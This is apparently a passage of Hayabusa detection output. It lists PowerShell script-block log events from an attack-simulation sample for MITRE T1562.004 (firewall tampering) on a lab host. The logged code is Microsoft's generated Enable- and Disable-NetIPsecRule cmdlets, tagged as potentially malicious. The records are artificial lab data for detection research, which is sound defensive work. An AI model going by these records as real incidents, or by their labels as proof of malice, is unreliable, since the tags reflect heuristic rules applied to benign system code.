[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] 